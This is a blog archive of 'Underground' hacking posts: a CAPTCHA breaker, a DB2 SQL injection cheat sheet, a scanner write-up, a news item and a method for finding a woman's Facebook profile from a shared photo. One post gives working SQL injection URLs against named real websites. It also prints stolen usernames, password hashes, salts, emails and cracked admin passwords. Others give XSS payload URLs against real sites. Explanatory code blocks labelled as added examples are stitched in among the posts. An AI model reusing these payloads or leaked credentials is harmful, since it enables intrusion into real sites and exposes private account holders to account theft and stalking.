
Archive for the ‘Underground’ Category

[Facebook] Identifying a Facebook user from nothing but a picture

December 31, 2010

I often see people on forums posting pictures taken from FB, and when it's a pretty girl you get curious about her FB profile..

So I finally dug into it... here's an example case.

I saw this picture:

The girl said she was in it with her older sibling...

woaaa, now I'm curious whether she's pretty or not...

Okay, first I looked at the URL of that image file, which looked like this (the capital X in the URL is a digit I've censored). At the time, Facebook's photo filenames embedded the uploader's numeric profile ID, and that is the number to grab:

Then I took that number, 53963478X, opened a new tab and typed into the address bar:

http://www.facebook.com/profile.php?id=53963478X

tadaaaaaa, wow, it opened lol

Categories: Hacking, Underground

Breaking Weak CAPTCHA in 26 Lines of Code

July 10, 2010

During one of our latest engagements we found a weak CAPTCHA implementation being used in the target Web application. The assessment was being performed on-site, and after identifying this vulnerability we started to talk with the CSO about how easy it would be to break it.


The general consensus, of course, was "very easy". The problem was that we were unable to find any good CAPTCHA-breaking software that the average Joe could download and run on his computer, so I spent a few minutes creating a simple Python script that returns the CAPTCHA solution for this particular implementation.

Before we dig into the script, let's analyze why this CAPTCHA is weak (it might not be obvious to some readers):

  1. The letters are not rotated
  2. All letters have the same height
  3. All letters have the exact same color
  4. The letters are not deformed in any way
  5. The background noise color is the same for the whole image

Now, let's see the code that breaks this CAPTCHA:

from PIL import Image
from pytesser import image_to_string   # pytesser: thin wrapper around the tesseract binary

img = Image.open('input.gif')
img = img.convert("RGBA")

pixdata = img.load()

# Clean the background noise: every pixel that is not pure black becomes white.
# This only works because all letters share one colour and the noise does not.
for y in range(img.size[1]):
    for x in range(img.size[0]):
        if pixdata[x, y] != (0, 0, 0, 255):
            pixdata[x, y] = (255, 255, 255, 255)

img.save("input-black.gif", "GIF")

# Make the image bigger (tesseract does poorly on tiny glyphs); NEAREST keeps
# the edges crisp instead of blurring them.
im_orig = Image.open('input-black.gif')
big = im_orig.resize((116, 56), Image.NEAREST)

ext = ".tif"
big.save("input-NEAREST" + ext)

# Perform OCR using the pytesser library
image = Image.open('input-NEAREST.tif')
print(image_to_string(image))

This simple script works with ~ 90% of the CAPTCHA images created using this specific implementation. Enjoy!
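The five weaknesses listed above are exactly what the script relies on, and the attack generalises: exact-colour thresholding removes any single-colour noise, and unrotated, undeformed glyphs of one height separate cleanly by column projection, after which recognising each one is a lookup. The following is an added example, not the original script and not pytesser: it models the whole pipeline in pure Python on a constructed 5x7 bitmap font, with exact template matching standing in for Tesseract. The glyph shapes, colours, noise density and the sample challenge text are all made up.

```python
import random

# Constructed 5x7 bitmap font ('#' = ink). Four glyphs are enough to show the
# pipeline; a real CAPTCHA font is bigger but no harder.
GLYPHS = {
    "A": ["..#..", ".#.#.", "#...#", "#####", "#...#", "#...#", "#...#"],
    "B": ["####.", "#...#", "#...#", "####.", "#...#", "#...#", "####."],
    "C": [".####", "#....", "#....", "#....", "#....", "#....", ".####"],
    "7": ["#####", "....#", "...#.", "..#..", ".#...", ".#...", ".#..."],
}
GLYPH_W, GLYPH_H = 5, 7
INK = (0, 0, 0)            # every letter is exactly this colour (weakness 3)
PAPER = (255, 255, 255)
NOISE = (120, 120, 120)    # one noise colour across the image (weakness 5)
GAP = 2                    # blank columns/rows around and between glyphs


def render(text, noise_px=60, noise_colour=NOISE, seed=1):
    """Return an RGB raster (list of rows of (r, g, b)) imitating the weak
    CAPTCHA: uniform noise first, then unrotated, undeformed glyphs on one
    baseline (weaknesses 1, 2 and 4)."""
    rng = random.Random(seed)
    width = GAP + len(text) * (GLYPH_W + GAP)
    height = GLYPH_H + 2 * GAP
    img = [[PAPER] * width for _ in range(height)]
    for _ in range(noise_px):
        img[rng.randrange(height)][rng.randrange(width)] = noise_colour
    x = GAP
    for ch in text:
        for dy, row in enumerate(GLYPHS[ch]):
            for dx, cell in enumerate(row):
                if cell == "#":
                    img[GAP + dy][x + dx] = INK
        x += GLYPH_W + GAP
    return img


def binarize(img):
    """The script's trick: anything that is not exactly black is background."""
    return [[1 if px == INK else 0 for px in row] for row in img]


def segment(bits):
    """Column projection: each glyph is a maximal run of columns containing
    ink. Works because nothing is rotated or sheared into its neighbour."""
    inked = [any(row[x] for row in bits) for x in range(len(bits[0]))]
    spans, start = [], None
    for x, on in enumerate(inked + [False]):  # sentinel closes the last run
        if on and start is None:
            start = x
        elif not on and start is not None:
            spans.append((start, x))
            start = None
    return spans


def crop(bits, x0, x1):
    """Cut one glyph out of the binary image and drop its blank rows, so the
    result is directly comparable with the font table."""
    rows = ["".join("#" if c else "." for c in row[x0:x1]) for row in bits]
    return [r for r in rows if "#" in r]


def recognize(img):
    """Binarize, segment, then identify each piece by exact template match.
    Exact matching only works because the letters are never deformed; the
    real script hands this step to Tesseract, which tolerates far more."""
    bits = binarize(img)
    out = []
    for x0, x1 in segment(bits):
        piece = crop(bits, x0, x1)
        hits = [ch for ch, glyph in GLYPHS.items() if glyph == piece]
        out.append(hits[0] if hits else "?")
    return "".join(out)


def colours(img):
    """Distinct pixel values present: three before thresholding, two after."""
    return {px for row in img for px in row}


if __name__ == "__main__":
    challenge = render("CAB7")
    print(sorted(colours(challenge)))   # ink, noise and paper
    print(recognize(challenge))          # the noise changes nothing
```

Passing `noise_colour=INK` to `render` shows the flip side: once the noise shares the ink colour, the threshold no longer separates them and the column runs merge, which is the first thing a fixed implementation should change.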

Categories: Security, Underground

DB2 SQL Injection Cheat Sheet

July 10, 2010

Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though, it pays to be prepared...

Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.

This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
    select versionnumber, version_timestamp from sysibm.sysversions;

Comments
    select blah from foo; -- comment like this

Current User
    select user from sysibm.sysdummy1;
    select session_user from sysibm.sysdummy1;
    select system_user from sysibm.sysdummy1;

List Users
    N/A. DB2 keeps no user accounts of its own: authentication is delegated to the operating system (or an external security plugin), so there is no user table to enumerate. Database authorities (DB2's equivalent of roles) can be listed like this:
    select grantee from syscat.dbauth;

List Password Hashes
    N/A, for the same reason: DB2 stores no password hashes.

List Privileges
    select * from syscat.tabauth; -- privs on tables
    select * from syscat.dbauth where grantee = current user;
    select * from syscat.tabauth where grantee = current user;

List DBA Accounts
    TODO

Current Database
    select current server from sysibm.sysdummy1;

List Databases
    SELECT schemaname FROM syscat.schemata; -- lists schemas; a DB2 connection only sees the catalog of its own database

List Columns
    select name, tbname, coltype from sysibm.syscolumns;

List Tables
    select name from sysibm.systables;

Find Tables From Column Name
    TODO

Select Nth Row
    select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
    (The inner query bounds the window from above; the outer one reverses the order and trims it from the other side.)

Select Nth Char
    SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

Bitwise AND
    Not available: DB2 8.2 has no bitwise operators (later releases added BITAND and related functions).

ASCII Value -> Char
    select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char -> ASCII Value
    select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting
    SELECT cast('123' as integer) FROM sysibm.sysdummy1;
    SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation
    SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
    select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

If Statement
    TODO

Case Statement
    TODO

Avoiding Quotes
    TODO

Time Delay
    No native sleep known; see the Heavy Queries article for some ideas.

Make DNS Requests
    TODO

Command Execution
    TODO

Local File Access
    TODO

Hostname, IP Address
    TODO

Location of DB files
    TODO

Default/System Databases
    TODO

This page will probably remain a work-in-progress for some time yet.  I’ll update it as I learn more.

Categories: Hacking, Security, Underground

Messing around in other people's houses, part 1

July 6, 2010

http://www.gencadam.net/en/

admin:7f12e2064eb055b6be03a473acfc9771:contact@gencadam.net:

admin:engenc00099

http://www.gencadam.net/en/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29r3m1ck,3,4,5/**/FROM/**/jos_users--

========

http://www.bulsho.dk/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29r3m1ck,3,4,5/**/FROM/**/jos_users--

admin:8ab893dd212a62b23447ae2073925cc8:KfVHoIGgho1F9ajh:bulsho@gmail.com:
,libaax12:389167c844757ca969f00cd9ab3c3337:VYBY7vGvBEJKsjQE:Frandol_165.9@hotmail.com:
,cabdicasis:00260d8b87a6fce6a6ee211b62e29b4b:cabdicasis@hotmail.com:
,guled:9ec35c0f02c63777cbc0e7c98519e3f4:LeEufIBo8YgWps0K:gulid@hotmail.com:
,jibril:6b92f611560c9b1cf370ed71b0abe88f:xb1zlbuWprq6scyK:4myangel@gmail.com:
,mubkos:bf9b65428310971c67c7e12699e3bcb0:0N7hh517D02NWUMV:dhaymoole@hotmail.com:
,Abdullqadir:ba78449adb51b564d34f0a95ff56079e:V5UCf4ibmo6iNaYF:Abdikadirey@hotmail.com:
,Abdikadirey@hotmail.com:c2c311bc7f0a70af0ebd609d47c63782:qaFNR6QtLT0F4SOE:Abdikadirey@hotmail.com:
,cabdinaasir2004:45e337722206f23b46ba8126a116eb56:sPEw4B9CCLdLCtys:cabdinaasir2004@hotmail.com:
,Hurdaayeyare:789e2333ee6f0d0eded0843a7bb437c0:AAn3j5FgMue2puEk:cismaaciil12@hotmail.com:
,caydruus:5ade1c16fab09598212fc25c31e3674b:DxMbCckrJnsyJGI9:caydruus@msn.com:
,qaloocoow:39f06b2fa0cd75c5079607e9fe87a813:8qhhG2r1HwcraZmg:maxgrane@hotm

cabdicasis : 281179

====

http://www.ptiq.ac.id/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)robusta_,3,4,5/**/FROM/**/jos_users--

=====

http://www.tvri.baliserve.com/home/search.php?keyword="><h1>robusta_+here+found+some+XSS+=.=d</h1>

=====
http://tube.transtv.co.id/

Put some XSS in the search box.

Categories: Exploit, Hacking, Underground

XSS-1

July 6, 2010

I swear I'm too lazy to do my actual work.. better to go messing around in other people's houses.. lalala

http://smansapati.com/news/?s=%22%3E%3Cscript%3Ealert%28%27robusta_+here+found+some+XSS%27%29%3C%2Fscript%3E
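The payload in that URL is percent-encoded, which hides what it does: `%22%3E` closes the attribute the search term is echoed into and `%3Cscript%3E` opens a script element, so the browser runs whatever follows. The following is an added example, not code from the original post: it decodes a URL carrying the same payload but aimed at a made-up host, echoes the term into a constructed search-form template the way the vulnerable page must have, and renders the same template once the term is HTML-encoded for an attribute context. The host, the form template and the tag-parsing check are all constructed; only the payload encoding follows the post.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed URL: same encoding as the payload in the post, pointed at example.com.
SAMPLE_URL = ("https://example.com/news/?s=%22%3E%3Cscript%3Ealert%28%27"
              "robusta_+here+found+some+XSS%27%29%3C%2Fscript%3E")

# Constructed WordPress-style search form; the term lands inside value="...".
FORM = ('<form action="/news/"><input type="text" name="s" value="%s">'
        '<input type="submit" value="Search"></form>')


def reflected_param(url, name="s"):
    """Decode the query parameter the way the server does: %XX sequences and
    '+' both become characters before anything reaches the template."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(term):
    """Echo the term raw. This is the bug: '">' ends the attribute and the
    tag, and everything after it is parsed as markup."""
    return FORM % term


def render_safe(term):
    """Same template, term encoded for an attribute context: quote=True turns
    '"' into &quot; and '>' into &gt;, so the parser never leaves the value."""
    return FORM % html.escape(term, quote=True)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(page):
    """Elements a parser actually creates from the page. The difference between
    the two renderings shows up here, not in a diff of the source text."""
    collector = _TagCollector()
    collector.feed(page)
    return collector.tags


if __name__ == "__main__":
    term = reflected_param(SAMPLE_URL)
    print(term)
    print(start_tags(render_vulnerable(term)))  # an extra script element appears
    print(start_tags(render_safe(term)))        # form, input, input only
```

Encoding must match the context the value lands in: `html.escape` with `quote=True` is right for a quoted attribute, but a term echoed into a `<script>` block or an unquoted attribute needs different treatment, which is why frameworks tie the encoder to the template position rather than to the input.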

WhatWeb Web Scanner

July 4, 2010

WhatWeb is a next-generation web scanner that identifies what websites are running. It has a flexible plugin architecture. Passive plugins use information in the headers, cookies, HTML body and URL. Aggressive plugins can identify versions of Joomla, phpBB, etc. by making extra requests to the web server.

It identifies content management systems (CMS), blogging platforms, stats/analytics packages, JavaScript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the web server is set up and what software is delivering the web page. Some of these hints are obvious, e.g. "Powered by XYZ", and others are more subtle. WhatWeb recognises these hints and reports what it finds.

WhatWeb has over 160 plugins and needs community support to develop more. Plugins can identify systems with the obvious signs removed by looking for subtle clues. For example, a WordPress site might remove the generator meta tag, but the WordPress plugin also looks for "wp-content", which is less easy to disguise. Plugins are flexible and can return any datatype; for example, plugins can return version numbers, email addresses, account IDs and more.

There are both passive and aggressive plugins. Passive plugins use information on the page, in cookies and in the URL to identify the system; a passive scan is as lightweight as a single GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write; you don't need to know Ruby to make them.
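To make the passive case concrete, here is an added example (not WhatWeb's own code, which is Ruby, and not one of its plugins) of how a passive plugin reasons: it is handed the one response to `GET /` and must identify software from headers, cookies and body alone, without a further request. The response is constructed to mimic the situation described above, a WordPress site that has stripped its generator tag; the plugin patterns, header values and body are all assumptions made for the example.

```python
import re

# Constructed response to GET /: a WordPress install with its generator meta
# tag removed, behind Apache and PHP, loading jQuery. Not captured from any host.
SAMPLE_RESPONSE = {
    "status": 200,
    "headers": {
        "Server": "Apache/2.2.14 (Ubuntu)",
        "X-Powered-By": "PHP/5.3.2",
        "Set-Cookie": ["wordpress_test_cookie=WP+Cookie+check; path=/"],
    },
    "body": (
        "<html><head><title>Blog</title>"
        "<link rel='stylesheet' href='/wp-content/themes/twentyten/style.css'>"
        "<script src='/wp-includes/js/jquery/jquery-1.4.2.min.js'></script>"
        "</head><body>Hello</body></html>"
    ),
}

# Passive plugins, WhatWeb-style: each match inspects the body, one header or
# the cookie names. A match flagged "version" reports its first capture group.
PLUGINS = {
    "WordPress": [
        {"where": "body", "regex": r"/wp-content/"},        # survives removal of the generator tag
        {"where": "body", "regex": r"/wp-includes/"},
        {"where": "cookie", "regex": r"^wordpress_"},
        {"where": "body", "version": True,
         "regex": r'<meta name="generator" content="WordPress ([\d.]+)"'},
    ],
    "Apache": [
        {"where": "header", "name": "Server", "version": True,
         "regex": r"^Apache(?:/([\d.]+))?"},
    ],
    "PHP": [
        {"where": "header", "name": "X-Powered-By", "version": True,
         "regex": r"PHP/([\d.]+)"},
    ],
    "jQuery": [
        {"where": "body", "version": True,
         "regex": r"jquery-([\d.]+)(?:\.min)?\.js"},
    ],
}


def cookie_names(response):
    """Names of every cookie the response sets (one Set-Cookie per list entry)."""
    return [c.split("=", 1)[0].strip() for c in response["headers"].get("Set-Cookie", [])]


def passive_scan(response, plugins=PLUGINS):
    """Run every plugin against the single response already in hand.
    Returns {product: version-or-None} for products with at least one hit;
    a hit that captured a version overrides a bare hit for the same product.
    No request is issued here, which is what makes the scan passive."""
    found = {}
    for product, matches in plugins.items():
        for m in matches:
            if m["where"] == "body":
                targets = [response["body"]]
            elif m["where"] == "header":
                targets = [response["headers"].get(m["name"], "")]
            else:
                targets = cookie_names(response)
            for target in targets:
                hit = re.search(m["regex"], target)
                if not hit:
                    continue
                version = hit.group(1) if m.get("version") and hit.groups() else None
                if product not in found or version:
                    found[product] = version
    return found


if __name__ == "__main__":
    for product, version in sorted(passive_scan(SAMPLE_RESPONSE).items()):
        print(product, version or "(version unknown)")
```

An aggressive plugin starts where this stops: once WordPress is flagged without a version, it would fetch paths such as the readme or login page and read the version from them, at the cost of extra requests that show up in the target's logs.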

Download whatweb-0.4.4.tar.gz
Latest Version 0.4.4, 29th June 2010
License GPLv3
Author urbanadventurer aka Andrew Horton from Security-Assessment.com

original site : http://www.morningstarsecurity.com/research/whatweb

Categories: Underground

Hackers target Microsoft Windows XP support system

July 3, 2010

Hi-tech criminals are “escalating” attacks on an unpatched bug in the Windows XP help and support system.

Microsoft said it had seen more than 10,000 machines hit by the attack that, so far, it has not found a fix for.

Windows PCs falling victim will have control of that machine handed over to attackers.

Microsoft said the attacks had gone from theoretical to real very quickly and urged users to take steps to protect themselves.
‘Nightmare’ attack

Microsoft revealed the upturn in attacks in a blog post saying that it had been monitoring activity around the loophole since it was first revealed on 10 June.

Found by Google engineer Tavis Ormandy, the loophole revolves around the Help and Support system built into XP. Mr Ormandy found that it was possible to exploit its ability to give remote aid and apply fixes to ailing machines.

Initially, said Microsoft, it only saw “innocuous” attacks by researchers attempting to replicate what Mr Ormandy had found.

Real exploits turned up on 15 June and these have been enthusiastically adopted by hi-tech criminals.

Writing on the Microsoft Security Centre blog, Holly Stewart said it had started seeing “seemingly-automated, randomly-generated” web pages that host the exploit.

A variety of trojans, spam tools and viruses are being downloaded to compromised machines, she said.

Rik Ferguson, senior security researcher at Trend Micro, said: “It’s certainly very serious and is now being actively exploited by what appears to be several different groups as you can see from the multiple payloads being delivered.”

Carole Theriault, senior security consultant at Sophos, said attacks like this were a "nightmare" to defend against if people did not regularly update or use anti-virus.

Statistics gathered by Microsoft suggest Portugal was taking the brunt of the attacks but users in Russia and Croatia were also being hit. More than 10,000 machines had been hit at least once by the attack, it found.

To avoid falling victim, Microsoft advised users to turn off the part of the Help and Support system that is vulnerable. It has produced an automated tool that can do this for users.

Mr Ferguson from Trend Micro said there were other steps users could take to stay safe.

“It is important to ensure that your security software is capable of identifying and blocking malicious websites,” he said, “as you can be sure that the criminals behind this will be constantly updating their malicious files to try and avoid traditional security.”

Microsoft said it was working on a lasting fix for the loophole.

Source : http://news.bbc.co.uk/2/hi/technology/10473495.stm

Categories: Underground